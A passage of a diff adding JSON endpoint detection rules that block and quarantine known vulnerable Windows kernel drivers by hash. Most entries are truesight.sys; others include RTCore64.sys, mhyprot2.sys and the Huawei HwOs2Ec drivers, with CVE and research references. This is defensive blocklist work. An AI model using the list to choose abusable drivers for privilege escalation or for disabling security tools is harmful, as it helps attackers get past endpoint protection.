+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978405Z",
+ "creation_date": "2026-03-23T11:45:29.978407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "881bca6dc2dafe1ae18aeb59216af939a3ac37248c13ed42ad0e1048a3855461",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d96a4fc1-b296-538e-82bc-03953659e08b",
+
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494248Z",
+ "creation_date": "2026-03-23T11:45:31.494251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494259Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c30705b05d89f543270f98a40358968e8c8f3f00003b9a9a6876b0e2377b8880",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d977723a-352f-59a8-8a43-867ba899b9b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614023Z",
+ "creation_date": "2026-03-23T11:45:29.614026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time":
"2026-03-23T11:45:29.614031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab494aba56e9ea7b6055ac437f6b678e7239b0fda54bf28019480565a098a6e3",
+ "comment": "Huawei vulnerable drivers (aka HwOs2Ec10x64.sys and HwOs2Ec7x64.sys) [CVE-2019-5241] [https://www.microsoft.com/security/blog/2019/03/25/from-alert-to-driver-vulnerability-microsoft-defender-atp-investigation-unearths-privilege-escalation-flaw/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d98b9fc4-3713-59b3-b95b-74cb80a82a5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474681Z",
+ "creation_date": "2026-03-23T11:45:31.474685Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474694Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf101fd701c0fe0e982f0bb75a6f641448ec5dc2cb60c75169d808a9b10ba996",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9917880-8e25-572d-b415-d3dec4afa848",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+
"test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143835Z",
+ "creation_date": "2026-03-23T11:45:32.143837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143842Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "530d9223ec7e4123532a403abef96dfd1af5291eb49497392ff5d14d18fccfbb",
+ "comment": "Vulnerable Kernel Driver (aka wnbios.sys) [https://www.loldrivers.io/drivers/baa168cd-eba2-42e4-95e9-47cb4b2f9094/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9a0f481-bd96-53bb-86fe-96278579bfb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482282Z",
+ "creation_date": "2026-03-23T11:45:31.482286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3c04f73d74190d00a92d323a9aed827e662fee5c6bc512e9da29ec9761eb8d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9a90aae-c06d-5d04-83b0-cea0b47b1599",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484056Z",
+ "creation_date": "2026-03-23T11:45:31.484060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10f63e7e207c0dee86afec7673dc2ddd83cbde7b6551f6981b30e0e5d3e66dec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9b15516-3ce4-5525-8299-addada173a52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id":
"af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147752Z",
+ "creation_date": "2026-03-23T11:45:31.147754Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147759Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e11b2d91ca03bccba36b3e84267502fd37763f77c934dedac99074b314dd112",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9b25515-41bf-5454-8c0c-3b8640236370",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144736Z",
+ "creation_date": "2026-03-23T11:45:31.144738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34478417edc805ad6ba9c3962208a46c3174aaba0b7c6e304ed77af70ee5ae5f",
+ "comment":
"Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9b68f89-5359-560c-a16e-f6118ef9c6a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481676Z",
+ "creation_date": "2026-03-23T11:45:30.481678Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481684Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba6c0c9b64fa739158b5f4465d53e67e574e4b954c8e143cf4e299f5daa65b60",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9bfa9bf-80d9-5f82-a1a6-0147c127de56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update":
"2026-03-23T11:45:30.480562Z",
+ "creation_date": "2026-03-23T11:45:30.480564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480569Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cf84400c09582ee2911a5b1582332c992d1cd29fcf811cb1dc00fcd61757db0",
+ "comment": "Vulnerable Kernel Driver (aka PDFWKRNL.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9e1984c-cab7-5536-adcd-7ba3f9271911",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607852Z",
+ "creation_date": "2026-03-23T11:45:29.607853Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607859Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2d8dd5dacc24051709f55a35184f5f99aef957a83bd358b0608b4479e1ec24f",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id":
"d9eceb03-de44-5663-986c-25a5e05787f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984226Z",
+ "creation_date": "2026-03-23T11:45:29.984228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984234Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c9dc878d9605070921338d09c6dbecbe11dec50c03fc69a0462884a07c2c442",
+ "comment": "Vulnerable Kernel Driver (aka AsrOmgDrv.sys) [https://www.loldrivers.io/drivers/3f39af20-802a-4909-a5de-7f6fe7aab350/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da0e13ab-28c0-530c-a1b0-7ea3865f8f02",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826120Z",
+ "creation_date": "2026-03-23T11:45:31.826122Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time":
"2026-03-23T11:45:31.826127Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6a3cda1283cdcbb4599eb0a3337838f61a70c1c0f34bc22c4b97d2c6a19a863",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da157e58-904b-5296-bcc9-418f4efbcfd4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.139994Z",
+ "creation_date": "2026-03-23T11:45:31.140011Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "35220d414d92ef023084dde1a8f12c1c2f645b2342a7d18848d48d630f283760",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da42cb82-e009-5157-a5be-7abd6861476b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+
"effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144193Z",
+ "creation_date": "2026-03-23T11:45:31.144195Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144200Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "426e74e8d62706d5f063c87f4de38d2269db432080b43df8939c026ec9e055e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da45f9d6-b9f3-5de3-b4a9-231f9e6edca6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814981Z",
+ "creation_date": "2026-03-23T11:45:31.814984Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814994Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+
"references": [],
+ "type": "hash",
+ "value": "8d3321a84669f27c4f53894496a1d57532032c99732a526422a4e641662b4d6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da4743f8-23c8-53df-a06e-2e1875f3c470",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.829469Z",
+ "creation_date": "2026-03-23T11:45:31.829471Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.829477Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bd74124e2e524ad2ab52444ac56184a33fd5a3df185c7ae71b29b1c86a316c2d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "da4b9f77-9b6a-5482-b2f7-89794bfb3c68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id":
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454710Z", + "creation_date": "2026-03-23T11:45:30.454713Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454721Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "342cf884840fc2b48c96398f690a1801ed8ac1ea59305af9e3d070d13ef85601", + "comment": "Vulnerable Kernel Driver (aka mhyprot2.sys) [https://www.loldrivers.io/drivers/57354c82-ff9c-4a54-8377-d195e4ff0a26/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da4c3454-bc7d-53f6-9e11-87dbe8dc0453", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829330Z", + "creation_date": "2026-03-23T11:45:31.829334Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829343Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f9f9d255e6405b4fa0ac9baf8776b3f0d9ab302ec7f78f12efdb4399c146983d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) 
AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da51fe4e-21e4-503f-8f87-5b7eec767fb4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.604503Z", + "creation_date": "2026-03-23T11:45:29.604505Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.604510Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ea80d2e65b03ea918f918d60cc8397aa4ee11eeb7bf679c7813311ff32ed5c81", + "comment": "Vulnerable Kernel Driver (aka STProcessMonitor.sys) [https://github.com/ANYLNK/STProcessMonitorBYOVD/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da5817a5-e459-54f0-b3c7-720c6d4d80ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489477Z", + "creation_date": "2026-03-23T11:45:31.489480Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.489487Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cb2fa8795007c4d8c2079d40ee1b9006ad708bd08492b37b3bbae486d7ab7e4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "da58922d-e475-5a29-b7ff-d001ac8dfac8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827238Z", + "creation_date": "2026-03-23T11:45:31.827241Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.827250Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "44fb4cef87bb15c279ec223d2c378de4aea56bbd8277f2f8b3cfec7586c84f4e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
